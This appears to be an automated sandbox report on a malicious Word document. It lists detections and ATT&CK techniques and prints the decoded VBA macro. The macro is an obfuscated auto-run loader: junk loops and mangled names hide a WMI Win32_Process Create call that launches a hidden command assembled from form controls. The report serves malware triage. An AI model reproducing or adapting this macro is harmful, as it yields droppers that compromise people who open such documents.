Verdict: MALICIOUS (Risk Score: 172)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute, and heuristics indicate a 'GetObject' call and p-code auto-execution, suggesting an attempt to run malicious code. The ClamAV detection as 'Doc.Downloader.Generic' further supports that this macro is intended to download and execute a second-stage payload. No specific family could be identified due to heavy obfuscation in the script.
Heuristics (7)

- ClamAV: Doc.Downloader.Generic-7542831-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7542831-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Loop Set Nujxkvorwdr = GetObject(Zzpjrlzqf) Do While Ttkezqms = 999`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() Zuavzvtcbh`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11723 bytes |

SHA-256: 59fde5abedccdff9a091c0dc2ff02f4261017b3a5913b86ec0330c6ad187c9a8

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 230 of 339 identifiers look randomly generated (e.g. 'roc9_msnnj883hn') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Xywjsyfyvjrci"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Zuavzvtcbh
End Sub
Attribute VB_Name = "Arqpynjunexpj"
Attribute VB_Base = "0{946D3CF8-BEC8-4DAA-9140-8C48411EFFD0}{B768260D-E8DD-4A84-81A9-9CACDCFAF149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Jwcmxsvuwe"
Function Zjryuyjsoo()
Do While Dmimsioyflj = 999
Do While Zrvqigqmie = 67 + 344
Jufqmvyws = CLng(Qrwripojdum)
Bxuvpevhjg = Int(9116 + 44)
Jhsqkqqjbey = CDate(QKoWc)
Ixuuvlwvupp = 1279 + Int(546)
Gouigkod = Chr(4806)
Vtsewoixy = Sqr(1512) + Hhbnovlso
Loop
Do While Phjcptxo = 33 + 5
Ipyachagms = 234 + Int(34)
Xygsuspclkps = Chr(44)
Uuzozkkuyr = Sqr(55) + Mollbanwkl
Yfyuaxzgwrmfh = CLng(Ficzpqigbrzj)
Iajzcptlq = Int(23 + 4)
Swpubfee = CDate(QKoWc)
Loop
Loop
Zerperwzhmpn = ChrW(wdKeyP)
Do While Mpzqhamviak = 999
Do While Ljjcfpwmcfqi = 67 + 344
Lrochrkaungg = CLng(Kbctvftd)
Aqhckjiic = Int(9116 + 44)
Etxdgilp = CDate(QKoWc)
Yrscadxnzzisj = 1279 + Int(546)
Jhpkeyeqdgi = Chr(4806)
Pxincjbypaj = Sqr(1512) + Udhslkvmwb
Loop
Do While Rxubpwszg = 33 + 5
Ruqzaruh = 234 + Int(34)
Sdbjkuyi = Chr(44)
Vmhklgxadrhe = Sqr(55) + Qxvkuvbt
Yutsebtq = CLng(Genfottud)
Ogzsmzonirbxf = Int(23 + 4)
Nfvbxqbsulkp = CDate(QKoWc)
Loop
Loop
Vcnuzhdnf = Zerperwzhmpn + Arqpynjunexpj.Izmqggskl + Arqpynjunexpj.Mmbmdjbkay
Do While Itsmhvdyrh = 999
Do While Caosstbxlyd = 67 + 344
Onffwrcvt = CLng(Ghfmlljq)
Ppfuyubwzkpog = Int(9116 + 44)
Xtvpfujgm = CDate(QKoWc)
Opmzonmizy = 1279 + Int(546)
Ywbztjmrbm = Chr(4806)
Soaldfjshng = Sqr(1512) + Zvccytkwiw
Loop
Do While Upxzuibky = 33 + 5
Naetphck = 234 + Int(34)
Punjodstqjr = Chr(44)
Jplsnffbl = Sqr(55) + Pcuavpflcqfv
Ffirhxjgtud = CLng(Pflndcsuljr)
Efeqdtbc = Int(23 + 4)
Wkeuljjzxrapg = CDate(QKoWc)
Loop
Loop
Fack = Arqpynjunexpj.Mnrsmdweu.Tag
Avgdnxbxgx = Split(Vcnuzhdnf + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Kbgydubgqm = 999
Do While Loynyuvqjgsxd = 67 + 344
Teyinxsobgmi = CLng(Putxgcaqvt)
Mzeiiujbicsdt = Int(9116 + 44)
Zxhlmyfumyzx = CDate(QKoWc)
Ciexoltksxsy = 1279 + Int(546)
Nbpefkbs = Chr(4806)
Yagfrkjxt = Sqr(1512) + Togfpzoej
Loop
Do While Cehlivrgrju = 33 + 5
Neotioufnvtnj = 234 + Int(34)
Lmoeolycxgb = Chr(44)
Mqwzrhrkk = Sqr(55) + Vyhoinyzwbufv
Npcqnhaps = CLng(Uvchfassiqdjt)
Crdrlajjt = Int(23 + 4)
Uhovipris = CDate(QKoWc)
Loop
Loop
Zjryuyjsoo = Abjmmlun + Join(Avgdnxbxgx, "") + Abjmmlun
Do While Lzlajort = 999
Do While Vzihnfbzci = 67 + 344
Ksjyxoxawucs = CLng(Dxekinwuraall)
Rfmvtpsrkrdvh = Int(9116 + 44)
Xpirbdvs = CDate(QKoWc)
Uqaiylcsdfop = 1279 + Int(546)
Hkfutfsoh = Chr(4806)
Kcudtwnm = Sqr(1512) + Ysjmgacehmhsd
Loop
Do While Ybzuzgjkeoi = 33 + 5
Jibdthisvhm = 234 + Int(34)
Kadvrzkmuvn = Chr(44)
Sohexxsnu = Sqr(55) + Dzwbyctmpj
Hiwixcomnm = CLng(Ukrkombpbrr)
Ioscbbvw = Int(23 + 4)
Vboukfmx = CDate(QKoWc)
Loop
Loop
End Function
Function Zuavzvtcbh()
wen = "i9_msnnj883hn///9_msnnj883hn///n9_msnnj883hn///9_msnnj883hn///mg9_msnnj883hn///9_msnnj883hn///mt9_msnnj883hn///" + ChrW(wdKeyS) + ":win32_" + Arqpynjunexpj.Gulztqhtg + "9_msnnj883hn///roc9_msnnj883hn///9_msnnj883hn///es9_msnnj883hn///9_msnnj883hn///s"
Do While Qmuanjsmgi = 999
Do While Tgoxsfqnxzsh = 67 + 344
Cvpmcfxmgx = CLng(Flylcesxxcxgj)
Dprumgchx = Int(9116 + 44)
Gquhaqbwzepm = CDate(QKoWc)
Pvnaxidqxux = 1279 + Int(546)
Jpceaoiy = Chr(4806)
Pbhenldo = Sqr(1512) + Gxlohzoqptzj
Loop
Do While Sgxaoxopnsx = 33 + 5
Eqftguvvlen = 234 + Int(34)
Zsiidgqt = Chr(44)
Odzffrjsr = Sqr(55) + Kakatoprgb
Nxwgfoqh = CLng(Jqqgppeclwor)
Yhjsbcfffalh = Int(23 + 4)
Deabmsqujm = CDate(QKoWc)
Loop
Loop
ski = "9_msnnj883hn///"
Do While Shuqmrpvefeg = 999
Do While Hbiyocxgsyqm = 67 + 344
Qpkftaoawletn = CLng(Byyjrgrvivyu)
Waayrepuznv = Int(9116 + 44)
Fwuupolqz = CDate(QKoWc)
Bqztcjug = 1279 + Int(546)
Aldvveghzl = Chr(4806)
Alyoaifayx = Sqr(1512) + Wafvspspcuekq
Loop
Do While Kejzfopqnuoi = 33 + 5
Cnddgyvy = 234 + Int(34)
Ktzjfgnxapv = Chr(44)
Xcihjsadggo = Sqr(55) + Bhkbyluup
Flggrhwehzf = CLng(Rlgjldnkkyfgm)
Jbtiptbymum = Int(23 + 4)
Jshwhnjmfk = CDate(QKoWc)
Loop
Loop
Iqtabmqfgunu = Split("9_msnnj883hn///9_msnnj883hn///9_msnnj883hn///w" + wen, ski)
Do While Qicqvfswz = 999
Do While Jcqssdxcxwfa = 67 + 344
Jycyuqvsxfjy = CLng(Vyswhafikqdms)
Kkibwmgpyeb = Int(9116 + 44)
Elitpahyditb = CDate(QKoWc)
Omuiyxdn = 1279 + Int(546)
Xrkojurf = Chr(4806)
Dyhkwrqpgbp = Sqr(1512) + Kscewdanrq
Loop
Do While Xpsoirnzzyqfk = 33 + 5
Hngtmwiaw = 234 + Int(34)
Ucbamhanyby = Chr(44)
Kbajmcxtlwtak = Sqr(55) + Appvhswlyyli
Mejniilvynujw = CLng(Iabjfnjmc)
Nqclattwz = Int(23 + 4)
Nbojeqbayv = CDate(QKoWc)
Loop
Loop
Zzpjrlzqf = Join(Iqtabmqfgunu, "")
Do While Hypvcmnw = 999
Do While Aessllqztexe = 67 + 344
Rulhpexr = CLng(Ucvmbmgy)
Asndccxvaw = Int(9116 + 44)
Tmeibfhn = CDate(QKoWc)
Uqxiqexhxz = 1279 + Int(546)
Cyghfngbqnxr = Chr(4806)
Htlareoqy = Sqr(1512) + Tltytzerb
Loop
Do While Btauhvsgs = 33 + 5
Iwdvxhgdlzjbm = 234 + Int(34)
Dxotahybssa = Chr(44)
Tysebtdwuxbwk = Sqr(55) + Gssnstruryerj
Dwkjknhezs = CLng(Iamwqkyvazm)
Bdafwctc = Int(23 + 4)
Fmbmmznsvvci = CDate(QKoWc)
Loop
Loop
Set Nujxkvorwdr = GetObject(Zzpjrlzqf)
Do While Ttkezqms = 999
Do While Uylklkbasd = 67 + 344
Obhrwkvdixln = CLng(Oyzgfeqghmk)
Ljaxiuafjw = Int(9116 + 44)
Cxibwnxevvda = CDate(QKoWc)
Echtvhmbjuhac = 1279 + Int(546)
Kebsldhhf = Chr(4806)
Nenpfzkkqyxpb = Sqr(1512) + Anotvkezl
Loop
Do While Iauxuciv = 33 + 5
Otohpscgm = 234 + Int(34)
Secttlpoifcyd = Chr(44)
Qsdvgffzmt = Sqr(55) + Gsbsybcqwr
Qthldlvk = CLng(Bjdritnfq)
Zjvgmexbanzp = Int(23 + 4)
Nytwaypva = CDate(QKoWc)
Loop
Loop
Arqobwwfdy = Zzpjrlzqf + ChrW(wdKeyS) + Arqpynjunexpj.Alojhpccrujkt.ControlTipText$ + Arqpynjunexpj.Bsffnmveyv.ControlTipText
Do While Rifdxbyzbqqhd = 999
Do While Nnmlpcdg = 67 + 344
Ihnlljqguf = CLng(Enafmzpa)
Lnfirwrwo = Int(9116 + 44)
Tptlnpgabj = CDate(QKoWc)
Jjzlkpeqwxbwa = 1279 + Int(546)
Suoyrdul = Chr(4806)
Tyjizlxjo = Sqr(1512) + Skhhklmvnwkhm
Loop
Do While Mlkvpxaeq = 33 + 5
Hwmenmkdzjhq = 234 + Int(34)
Iqljjrwutzmy = Chr(44)
Bsfqqpepi = Sqr(55) + Ywjpweuddh
Vhzyndmspte = CLng(Dqasnshca)
Nexurupztckj = Int(23 + 4)
Qmwqufsgisn = CDate(QKoWc)
Loop
Loop
Jcagkmzbinuo = Arqobwwfdy + Arqpynjunexpj.Gulztqhtg
Do While Vxpzgufeoite = 999
Do While Ygbfnawlzv = 67 + 344
Onwsjowlpmdj = CLng(Jmnwsxjpn)
Jacykxtumfsh = Int(9116 + 44)
Ehpwldrxgrjxd = CDate(QKoWc)
Kyzyzznun = 1279 + Int(546)
Kpvbqerwopt = Chr(4806)
Ucmukomu = Sqr(1512) + Bhsiwaqnbr
Loop
Do While Bbeafghosqfx = 33 + 5
Nsjzsvtduuywu = 234 + Int(34)
Brcfbakqjjgmb = Chr(44)
Buezmxdcyb = Sqr(55) + Hkcilkqqzdsbw
Zqmirjjs = CLng(Vjaxpeeccdgh)
Bldlxbccjudm = Int(23 + 4)
Hpxrxrpbpsjz = CDate(QKoWc)
Loop
Loop
Set Zuavzvtcbh = GetObject(Jcagkmzbinuo)
Do While Xzudgsofi = 999
Do While Murlabordpi = 67 + 344
Pczgsnibqbj = CLng(Dootcdfwic)
Kicqeqos = Int(9116 + 44)
Dshnurlwshi = CDate(QKoWc)
Acjnfbuhzudhf = 1279 + Int(546)
Llukfplwlo = Chr(4806)
Llkxvtkcovd = Sqr(1512) + Ihdyefolakg
Loop
Do While Mipfyywojvpwi = 33 + 5
Cwqiktwihygj = 234 + Int(34)
Kadkxhcn = Chr(44)
Fndzmobwrujdu = Sqr(55) + Epahhrob
Ulmkhsootdxqx = CLng(Wksashgfisrc)
Fqlqarcp = Int(23 + 4)
Buobveosdo = CDate(QKoWc)
Loop
Loop
Zuavzvtcbh. _
showwindow = False
Do While Rrclpfytkq = 999
Do While Ziubkgeuu = 67 + 344
Pqkfzeidaqjir = CLng(Xksxpynvegf)
Yjssqtnufz = Int(9116 + 44)
Bnfppzdivit = CDate(QKoWc)
Mzbufytmxeryr = 1279 + Int(546)
Fuslthnlhgphb = Chr(4806)
Qpqvdtlazag = Sqr(1512) + Ioqyhgcap
Loop
Do While Pzounqrrd = 33 + 5
Bhwoduuskmf = 234 + Int(34)
Spqzvgoa = Chr(44)
Fefqmjjoy = Sqr(55) + Micscigxyvjq
Yzrvxsnv = CLng(Jydhiayhlhf)
Htxidinwoto = Int(23 + 4)
Staehrjlje = CDate(QKoWc)
Loop
Loop
Do While Nujxkvorwdr.Create(pok & Zjryuyjsoo, Wsdstgndcmu, Zuavzvtcbh, Fdftuszp)
Loop
Do While Anhndkzl = 999
Do While Dczwxzlkkco = 67 + 344
Ssabcqajs = CLng(Nfnkaxuybwe)
Gxbbfmtmfipvc = Int(9116 + 44)
Ukhlskislakmh = CDate(QKoWc)
Iotduepzdfpc = 1279 + Int(546)
Yoxoxdrpsglyf = Chr(4806)
Vzmvkzac = Sqr(1512) + Tekdfciavnl
Loop
Do While Kmdtvnswyayhg = 33 + 5
Xxxmyaezg = 234 + Int(34)
Ddxkbojbcih = Chr(44)
Ogruemvzz = Sqr(55) + Ypznyfnw
Joyoyjyeb = CLng(Rsxrijvtpod)
Mlpvdwukxxfr = Int(23 + 4)
Fcxuxdmgx = CDate(QKoWc)
Loop
Loop
End Function
```